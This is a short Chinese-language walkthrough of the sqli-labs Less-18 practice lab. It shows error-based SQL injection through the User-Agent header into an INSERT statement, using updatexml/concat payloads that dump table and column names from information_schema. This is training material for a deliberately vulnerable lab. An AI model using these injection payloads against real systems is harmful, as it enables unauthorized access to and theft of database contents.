sqli-labs_Less18

​
输入正确的账号和密码后出现UA头，可以判断注入点在User-Agent请求头中

随便输入一个’引号出现以下报错

由此判断很有可能是一个报错注入，语句可能是INSERT INTO table VALUE (contains)语句这里闭合了前面的’写入一个or语句

根据报错信息猜测它的语句可能是VALUES(‘$value1’,‘$value2’,‘$value3’)

这里咱们闭合$VALUE1前面的引号，当然后面的引号也需要闭合，最后构造

or 报错语句> or

拼接到sql语句中就是

VALUES(''or or'', '\$value2', '$value3')

爆出库名，接下来就是爆表名

' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1) or '

爆出字段，这里没有显示完全，使用mid()函数

' or updatexml(1,concat(0x7e,(mid((select group_concat(column_name) from information_schema.columns where table_name='users'),1,31)),0x7e),1) or '

​